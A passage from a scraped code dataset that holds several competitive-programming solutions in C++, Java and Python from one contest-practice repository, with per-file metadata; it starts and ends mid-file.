Math.pow(2, logSpeed);\n\t\t\t\t\t\tsetTitle(\"[Q] <speed decreased> \" + 
speed);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'E':\n\t\t\t\t\t\tlogSpeed = Math.min(logSpeed + 1.0, 10.0);\n\t\t\t\t\t\tspeed = Math.pow(2, logSpeed);\n\t\t\t\t\t\tsetTitle(\"[E] <speed increased> \" + speed);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'I':\n\t\t\t\t\t\tlogZoom = Math.min(logZoom + 1.0, 10.0);\n\t\t\t\t\t\tzoom = Math.pow(2, logZoom);\n\t\t\t\t\t\tsetTitle(\"[I] <zoom in> \" + zoom);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'O':\n\t\t\t\t\t\tlogZoom = Math.max(logZoom - 1.0, -4.0);\n\t\t\t\t\t\tzoom = Math.pow(2, logZoom);\n\t\t\t\t\t\tsetTitle(\"[O] <zoom out> \" + zoom);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'K':\n\t\t\t\t\t\tlogAngleOfView = Math.min(logAngleOfView + 1.0, 10.0);\n\t\t\t\t\t\tangleOfView = Math.pow(2, logAngleOfView);\n\t\t\t\t\t\tsetTitle(\"[K] <field of view narrowed> \" + angleOfView);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'L':\n\t\t\t\t\t\tlogAngleOfView = Math.max(logAngleOfView - 1.0, -4.0);\n\t\t\t\t\t\tangleOfView = Math.pow(2, logAngleOfView);\n\t\t\t\t\t\tsetTitle(\"[L] <field of view expanded> \" + angleOfView);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n case '3':\n MainFrame.d3 = !MainFrame.d3;\n\t\t\t\t\t\tsetTitle(\"[3] 3d-view is \" + (MainFrame.d3 ? 
\"ON\" : \"OFF\"));\n\t\t\t\t\t\tMainFrame.redo();\n drawPlot();\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false;\n\t\t\t}\n\t\t});\n\n\t}\n}\n" }, { "alpha_fraction": 0.31736525893211365, "alphanum_fraction": 0.46107783913612366, "avg_line_length": 26.83333396911621, "blob_id": "ae0cba1e87c5b72460669c20223481ec27fc07f7", "content_id": "36269f4c4a72c645f09fc26fae76dcf7e8de1946", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 73, "num_lines": 6, "path": "/CodeForce/1275/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 10 ** 5\nq = 10 ** 5\nprint(n, q)\nprint(*list(i for i in range(n)))\nfor i in range(q):\n print(0, n - 5, i % 256, (i + 1) % 256, (i + 2) % 256, (i + 3) % 256)\n" }, { "alpha_fraction": 0.4094216823577881, "alphanum_fraction": 0.602834165096283, "avg_line_length": 24.34951400756836, "blob_id": "3046c739beca3c09281d63075d41e7638aafaa1e", "content_id": "44bf62eaa2746ed4735805562e443263f062b8eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2611, "license_type": "no_license", "max_line_length": 928, "num_lines": 103, "path": "/2013/2013gcj/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <math.h>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n#define ll long long\n\nusing namespace std;\nint INF = 1000000007;\nconst int size = 48;\nll ans[size] = 
{\n1ll,\n4ll,\n9ll,\n121ll,\n484ll,\n10201ll,\n12321ll,\n14641ll,\n40804ll,\n44944ll,\n1002001ll,\n1234321ll,\n4008004ll,\n100020001ll,\n102030201ll,\n104060401ll,\n121242121ll,\n123454321ll,\n125686521ll,\n400080004ll,\n404090404ll,\n10000200001ll,\n10221412201ll,\n12102420121ll,\n12345654321ll,\n40000800004ll,\n1000002000001ll,\n1002003002001ll,\n1004006004001ll,\n1020304030201ll,\n1022325232201ll,\n1024348434201ll,\n1210024200121ll,\n1212225222121ll,\n1214428244121ll,\n1232346432321ll,\n1234567654321ll,\n4000008000004ll,\n4004009004004ll,\n100000020000001ll,\n100220141022001ll,\n102012040210201ll,\n102234363432201ll,\n121000242000121ll,\n121242363242121ll,\n123212464212321ll,\n123456787654321ll,\n400000080000004ll};\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nint test()\n{\n ll n, m;\n cin >> n >> m;\n return upper_bound(ans, ans + size, m) - lower_bound(ans, ans + size, n);\n}\n\nint main()\n{\n freopen(\"input.in\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%d\\n\", test());\n }\n for (int i = 0; i < size; i++)\n cout << (ll) sqrt(ans[i]) << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.5188770294189453, "alphanum_fraction": 0.5246853828430176, "avg_line_length": 23.595237731933594, "blob_id": "62ab0d0f85543720cb690bfdf256719f84027a8a", "content_id": "7b5d22649faf357a32c803edc2c86b6a34a7e138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1033, "license_type": "no_license", "max_line_length": 77, "num_lines": 42, "path": "/2021/yandexBackendQual/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "class item:\n def __init__(self, index, start, end, t):\n self.index = index\n self.start = start\n self.end = end\n self.t = t\n\n def __str__(self):\n return f'{self.index},{self.start} {self.end},{self.t}'\n\nitems = []\n\nwhile True:\n try:\n line = input()\n if line == '':\n break\n except:\n break\n index, dates, t = line.split(',')\n index = int(index)\n start, end = dates.split()\n if t == 'NULL':\n items.append(item(index, start, end, 'KGT'))\n items.append(item(index, start, end, 'COLD'))\n items.append(item(index, start, end, 'OTHER'))\n else:\n items.append(item(index, start, end, t))\n\nitems.sort(key = lambda x: [x.index, x.t[1], x.start])\nres = [items[0]]\nn = len(items)\n\nfor i in range(1, n):\n last = res[-1]\n cur = items[i]\n if last.index == cur.index and last.t == cur.t and cur.start <= last.end:\n res[-1].end = max(res[-1].end, cur.end)\n else:\n res.append(cur)\n\nprint(*res, sep = '\\n')\n" }, { "alpha_fraction": 0.4954128563404083, "alphanum_fraction": 0.5321100950241089, 
"avg_line_length": 26.25, "blob_id": "e060398496570ac876f3b123167681047620cd37", "content_id": "868fd08f12d8d512be045c2775c55ad2ba9dcfd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 109, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/2020/bguirQual/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "t = int(input())\nfor i in range(t):\n x = sum(map(int, input().split())) + 1\n print(1 if x > 50 else x)\n" }, { "alpha_fraction": 0.49240341782569885, "alphanum_fraction": 0.5133844614028931, "avg_line_length": 36.35675811767578, "blob_id": "ba12e53e3fef9ed954a7df53df5356d0528dbb2d", "content_id": "d75915cb54b2eb251685956057ec3ae996a34563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6911, "license_type": "no_license", "max_line_length": 174, "num_lines": 185, "path": "/CodeForce/1544/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//modular\ntemplate<typename T = int, T mod = 31607>\nstruct modular\n{\n T value;\n\n modular() : value(0) {}\n modular(const modular& other) : value(other.value) {}\n modular operator=(const modular& other) { value = other.value; return *this; }\n template<typename T1> modular operator=(const T1& other) { value = other % mod; if (value < 0) value += mod; return *this; }\n template<typename T1> modular(T1 const& other) { value = other % mod; if (value < 0) value += mod; }\n template<typename T1> modular(T1 const& num, T1 const& den) { *this = modular(den) ^ (mod - 2) * num; }\n template<typename T1> modular& operator^=(T1 const& deg) { modular a(*this); for (T1 n = deg - 1; n > 0; n >>= 1) { if (n & 1) *this *= a; a *= a; } return *this; }\n template<typename T1> modular operator^ (T1 const& deg) const { return modular(*this) ^= deg; }\n inline modular& operator+=(modular const& t) { value += t.value; if (value >= mod) value -= mod; return *this; }\n inline modular& operator-=(modular const& t) { value -= t.value; if (value < 0 ) value += mod; return *this; }\n inline modular& operator*=(modular const& t) { value = (value * 1ll * t.value) % mod; return *this; }\n inline modular& operator/=(modular const& t) { return *this *= ~t; }\n inline modular operator+ (modular const& t) const { return modular(*this) += t; }\n inline modular operator- (modular const& t) const { return modular(*this) -= t; }\n inline modular operator* (modular const& t) const { return 
modular(*this) *= t; }\n inline modular operator/ (modular const& t) const { return modular(*this) /= t; }\n inline modular operator~ ( ) const { return modular(T(1), value); }\n inline bool operator==(modular const& t) const { return value == t.value; }\n inline bool operator!=(modular const& t) const { return value != t.value; }\n explicit operator T() const { return value; }\n\n inline friend ostream& operator<<(ostream& os, modular const& m) { return os << m.value; }\n inline friend istream& operator>>(istream& is, modular& m) { return is >> m.value; m.value %= mod; if (m.value < 0) m.value += mod; }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<vector<modular<>>> a(n, vector<modular<>>(n));\n readln(a);\n //modular X = 1;\n fori(n)\n forj(n)\n a[i][j] /= 10000;\n //vector<modular<>> p(n + 1, 1);\n //vector<modular<>> q(n + 1, 1);\n //fori(n)\n //{\n //p[0] *= a[i][i];\n //q[0] *= a[i][n - i - 1];\n //forj(n)\n //p[i + 1] *= a[i][j],\n //q[j + 1] *= a[i][j];\n //}\n //modular fastP;\n //modular fastQ;\n //modular d1 = p[0];\n //modular d2 = q[0];\n //FOR(mask, 1, 1 << (n))\n //{\n //int bits = __builtin_popcount(mask);\n //int sign = bits % 2 == 0 ? -1 : 1;\n //modular tempP = 1;\n //modular tempQ = 1;\n //fori(n)\n //if ((1 << i) & mask)\n //tempP *= p[i + 1],\n //tempQ *= q[i + 1];\n //fastP += tempP * sign;\n //fastQ += tempQ * sign;\n //}\n //vector<modular<>> pp = {fastP, fastQ, d1, d2};\n //int m = pp.size();\n //modular fast;\n //FOR(mask, 1, 1 << m)\n //{\n //int bits = __builtin_popcount(mask);\n //int sign = bits % 2 == 0 ? 
-1 : 1;\n //modular temp = 1;\n //fori(m)\n //if ((1 << i) & mask)\n //temp *= pp[i];\n //fast += temp * sign;\n //}\n\n modular ans;\n int eee = 0;\n FOR(mask, 0, 1 << (n * n))\n {\n vector<vector<int>> b(n, vector<int>(n));\n fori(n)\n forj(n)\n if (mask & (1 << (i * n + j)))\n b[i][j] = 1;\n bool ok = false;\n fori(n)\n {\n int cnt = 0;\n forj(n)\n cnt += b[i][j];\n ok |= cnt == n;\n }\n forj(n)\n {\n int cnt = 0;\n fori(n)\n cnt += b[i][j];\n ok |= cnt == n;\n }\n int cnt = 0;\n fori(n)\n cnt += b[i][i];\n ok |= cnt == n;\n cnt = 0;\n fori(n)\n cnt += b[i][n - i - 1];\n ok |= cnt == n;\n if (ok) {\n eee++;\n modular temp = 1;\n fori(n)\n forj(n)\n if (b[i][j])\n temp *= a[i][j];\n else\n temp *= (modular(1) - a[i][j]);\n ans += temp;\n }\n }\n writeln(ans);\n //writeln(fast, fastP, fastQ, p[0], p[1], modular(7) / 16, X, modular(1) / 16);\n //writeln(fastP + fastQ - fastP * fastQ + X * X);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5414462089538574, "alphanum_fraction": 0.552028238773346, "avg_line_length": 
18.55172348022461, "blob_id": "f39ea5e0f2407cc5fb66ab290465cf60219dbe2d", "content_id": "7b0e5deedd9248edacba5dc2483282e734b14309", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "no_license", "max_line_length": 62, "num_lines": 29, "path": "/2023/tin/3.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "# python 3.10\nimport itertools\n\n\nans = set()\nchars = set()\n\ndef get(cc, s, i):\n if s:\n ans.add(s)\n if i == len(cc):\n return\n get(cc, s, i + 1)\n get(cc, s + cc[i], i + 1)\n\n\ndef find_combinations(text: str) -> list[str]:\n for c in text:\n chars.add(c)\n cc = list(chars)\n for xx in itertools.permutations(cc):\n get(xx, '', 0)\n return list(sorted(ans))\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом. \n print(', '.join(find_combinations(input_str)))\n" }, { "alpha_fraction": 0.5282805562019348, "alphanum_fraction": 0.5350678563117981, "avg_line_length": 21.66666603088379, "blob_id": "797c093bcdd6d6ec600a63b34ac26923ad92c9ee", "content_id": "0860b23f09eeddeda72f54a35bb08a8b5bf2bc65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1768, "license_type": "no_license", "max_line_length": 85, "num_lines": 78, "path": "/2014/gcj2014_0/B.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef CASE_HPP\n#define CASE_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) 
for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nclass Case : public QObject, public QRunnable\n{\n Q_OBJECT\n double C, F, X, i, ans = 0, time = 0;\n\npublic:\n void readInput(QTextStream &in)\n {\n in >> C >> F >> X;\n }\n\n void writeResults(QTextStream &out)\n {\n out << \"Case #\" << case_number << \": \";\n out.setRealNumberPrecision(10);\n out << ans << \"\\n\";\n }\n\n void solution()\n {\n i = 2;\n ans = X / i;\n while (true)\n {\n if (C / i + X / (i + F) > X / i)\n break;\n time += C / i;\n i += F;\n ans = min(ans, time + X / i);\n }\n }\n\n explicit Case() : QObject(0), solved(false) { setAutoDelete(false); }\n\n void run()\n {\n solution();\n solved = true;\n emit caseSolved(this);\n }\n\n inline bool is_solved() const { return solved; }\n inline void setCaseNumber(int n) { case_number = n; }\n\nsignals:\n void caseSolved(Case*);\n\nprivate:\n int case_number;\n bool solved;\n};\n\n#endif // CASE_HPP\n" }, { "alpha_fraction": 0.2768867015838623, "alphanum_fraction": 0.283640056848526, "avg_line_length": 28.07106590270996, "blob_id": "06f69f52ed905d960917d7b9411d0e368ad48411", "content_id": "cb5f581985f9d4bd94e50ecd9e7d3c0af68027aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8486, "license_type": "no_license", "max_line_length": 78, "num_lines": 197, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/E.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\n \r\nimport static java.lang.Math.*;\r\n \r\npublic class E {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n    final static Random rnd = new Random();\r\n \r\n    long[] mul(long[] x, long[] y) {\r\n        long[] z = 
new long[x.length + y.length + 1];\r\n \r\n        for (int i = 0; i < x.length; i++) {\r\n            for (int j = 0; j < y.length; j++) {\r\n                int k = i + j;\r\n                z[k] += x[i] * y[j];\r\n            }\r\n        }\r\n \r\n        return z;\r\n    }\r\n \r\n    long gcd(long a, long b) {\r\n        return b == 0 ? a : gcd(b, a % b);\r\n    }\r\n \r\n    public void solve() {\r\n        String p = in.next();\r\n        int n = in.nextInt(), m = in.nextInt();\r\n        long[] u = new long[] { 1 }, v = new long[] { 1 };\r\n \r\n        if (p.equals(\"inf\")) {\r\n            for (int i = 0; i < n; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                u = mul(u, new long[] { b, a });\r\n            }\r\n \r\n            for (int i = 0; i < m; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                v = mul(v, new long[] { b, a });\r\n            }\r\n \r\n            for (int i = u.length - 1; i >= -1; i--) {\r\n                if (i == -1 || u[i] != 0) {\r\n                    for (int j = v.length - 1; j >= -1; j--) {\r\n                        if (j == -1 || v[j] != 0) {\r\n                            long a = (i == -1) ? 0 : u[i];\r\n                            long b = (j == -1) ? 
0 : v[j];\r\n \r\n                            if (i < j) {\r\n                                out.println(\"0/1\");\r\n                            } else if (i > j) {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n                                out.println(\"inf\");\r\n                            } else {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n \r\n                                a = Math.abs(u[i]);\r\n                                b = Math.abs(v[j]);\r\n \r\n                                long g = gcd(a, b);\r\n \r\n                                out.println((a / g) + \"/\" + (b / g));\r\n                            }\r\n \r\n                            return;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n \r\n        } else {\r\n            long q = Long.parseLong(p);\r\n \r\n            for (int i = 0; i < n; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                u = mul(u, new long[] { b + a * q, a });\r\n            }\r\n \r\n            for (int i = 0; i < m; i++) {\r\n                int a = in.nextInt(), b = in.nextInt();\r\n                v = mul(v, new long[] { b + a * q, a });\r\n            }\r\n \r\n            for (int i = 0; i <= u.length; i++) {\r\n                if (i == u.length || u[i] != 0) {\r\n                    for (int j = 0; j <= v.length; j++) {\r\n                        if (j == v.length || v[j] != 0) {\r\n                            long a = (i == u.length) ? 0 : u[i];\r\n                            long b = (j == v.length) ? 
0 : v[j];\r\n \r\n                            if (i > j) {\r\n                                out.println(\"0/1\");\r\n                            } else if (i < j) {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n                                out.println(\"inf\");\r\n                            } else {\r\n                                if ((a < 0) ^ (b < 0)) {\r\n                                    out.print('-');\r\n                                }\r\n \r\n                                a = Math.abs(u[i]);\r\n                                b = Math.abs(v[j]);\r\n \r\n                                long g = gcd(a, b);\r\n \r\n                                out.println((a / g) + \"/\" + (b / g));\r\n                            }\r\n \r\n                            return;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n \r\n        }\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new 
InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new E().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.29821881651878357, "alphanum_fraction": 0.31857505440711975, "avg_line_length": 21.586206436157227, "blob_id": "c2d76b64393dd18628abc273dd4523967015e409", "content_id": "0f08c8d2dd8fc2d79d9f99ebe2230d72f0c67fed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3930, "license_type": "no_license", "max_line_length": 85, "num_lines": 174, "path": "/2013/2013FBHC/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <algorithm>\n#include <cstdlib>\n#include <string>\n#include <iostream>\n#include <cstdio>\n#include <vector>\n#include <iterator>\n#include <queue>\n\nusing namespace std;\n\nint n, k, l, classes;\nvector<int> s, c, c1, head, a, a1, temp, a_1;\n\ntemplate <class T>\nvoid writeln(vector<T> &a)\n{\n for (int i = 0; i < n; i++)\n printf(\"%d \", a[i]);\n// copy(a.begin(), a.end(), ostream_iterator<T>(cout, \" \"));\n printf(\"\\n\");\n}\n\nvoid read(string ss)\n{\n int i = 0;\n char d;\n for (int j = 0; j < ss.size(); j++)\n {\n d = ss[j];\n s[i] = d - 'a' 
+ 1;\n a[i] = i++;\n }\n s[i] = 0;\n a[i] = i++;\n n = i;\n}\n\nvoid radix(vector<int> &a)\n{\n for (int i = 0; i < n; i++)\n head[s[a[i]] + 1]++;\n head[0] = 0;\n for (int i = 1; i < 28; i++)\n head[i] += head[i - 1];\n for (int i = 0; i < n; i++)\n temp[head[s[a[i]]]++] = a[i];\n c[a[0]] = 0;\n classes = 1;\n a = temp;\n for (int i = 1; i < n; i++)\n {\n if (s[a[i]] != s[a[i - 1]])\n classes++;\n c[a[i]] = classes - 1;\n }\n}\n\nvoid suffix_array(vector<int> &s)\n{\n radix(a);\n for (int l = 1; l < n; l *= 2)\n {\n head.clear();\n head.resize(classes, 0);\n for (int i = 0; i < n; i++)\n head[c[a1[i] = (a[i] - l + n) % n]]++;\n for (int i = 1; i < classes; i++)\n head[i] += head[i - 1];\n for (int i = n - 1; i >= 0; i--)\n a[--head[c[a1[i]]]] = a1[i];\n classes = 1;\n c1[a[0]] = 0;\n for (int i = 1; i < n; i++)\n {\n if (c[a[i]] != c[a[i - 1]] || c[(a[i] + l) % n] != c[(a[i - 1] + l) % n])\n classes++;\n c1[a[i]] = classes - 1;\n }\n c = c1;\n }\n}\n\nbool qq(string ss)\n{\n for (int i = 0; i < ss.size(); i++)\n if (ss[i] != 'a' + i)\n return false;\n return true;\n}\n\nint main()\n{\n freopen(\"distinct.out\", \"w+\", stdout);\n //freopen(\"distinct.in\", \"r\", stdin);\n// int m;\n //scanf(\"%d\", &m);\n for (int m = 2; m < 40; m++)\n {\n //cout << m << \"\\n\";\n if (m == 1)\n {\n cout << \"a\\n\";\n return 0;\n }\n\n //cout << m << \"\\n\";\n string ss = \"aa\";\n while (true)\n {\n n = 100;\n\n s.clear();\n c.clear();\n head.clear();\n a.clear();\n a1.clear();\n a_1.clear();\n c1.clear();\n temp.clear();\n\n s.resize(n);\n c.resize(n);\n head.resize(n);\n a.resize(n);\n a_1.resize(n + 1);\n a1.resize(n);\n c1.resize(n);\n temp.resize(n);\n read(ss);\n/// cout << ss << \"\\n\";\n suffix_array(s);\n int z = 0;\n long long ans = 0;\n for (int i = 0; i < n; i++)\n a_1[a[i]] = i;\n int i;\n for (int j = 0; j < n; j++)\n {\n i = a_1[j];\n for (; s[a[i] + z] == s[a[(i + 1) % n] + z]; z++);\n ans = ans + n - 1 - a[i] - z;\n if (z > 0)\n z--;\n }\n// cout << ans << 
\"\\n\";\n if (ans == m)\n {\n cout << ss << \"\\n\";\n break;\n }\n if (qq(ss))\n {\n int h = ss.size() + 1;\n ss = \"\";\n for (int g = 0; g < h; g++)\n ss.push_back('a');\n }\n else\n {\n if (ss[ss.size() - 1] == ss[ss.size() - 2] + 1)\n {\n int i = ss.size() - 1;\n while (i >= 1 && ss[i - 1] == ss[i] - 1)\n ss[i--] = 'a';\n ss[i]++;\n }\n else\n ss[ss.size() - 1]++;\n }\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.31480762362480164, "alphanum_fraction": 0.3227749764919281, "avg_line_length": 23.273584365844727, "blob_id": "78f2026c9c01868ebef78296e60cdef94e48940a", "content_id": "99c02b1bb51fbf4d842e00ca0884835050c4d92c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5146, "license_type": "no_license", "max_line_length": 78, "num_lines": 212, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.27/I.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.util.Map.Entry;\nimport java.io.*;\n \npublic class I {\n FastScanner in;\n PrintWriter out;\n \n final String taskName = null;\n \n class Pair {\n int p, n;\n \n Pair(int p, int n) {\n this.p = p;\n this.n = n;\n }\n \n @Override\n public String toString() {\n return \"<\" + p + \" \" + n + \">\";\n }\n }\n \n int m = 500003;\n ArrayList<Integer>[] g = new ArrayList[m];\n int[] size = new int[m];\n \n void dfs(int v) {\n size[v] = 0;\n for (int u : g[v]) {\n dfs(u);\n size[v] += (size[u] + 1);\n }\n }\n \n void mull(Map<Integer, Integer> map, List<Pair> n) {\n for (Pair pair : n) {\n pair\n Integer e = map.get(pair.p);\n if (e == null) {\n e = 0;\n }\n map.put(pair.p, e + pair.n);\n }\n }\n \n public void solve() {\n ArrayList<Pair>[] fac = new ArrayList[m];\n \n for (int i = 0; i < m; i++) {\n g[i] = new ArrayList<Integer>(32);\n fac[i] = new ArrayList<Pair>(32);\n }\n boolean[] p = new boolean[m];\n \n Arrays.fill(p, true);\n p[0] = p[1] = false;\n for (int i = 2; i < m; i++) {\n if (p[i]) {\n for 
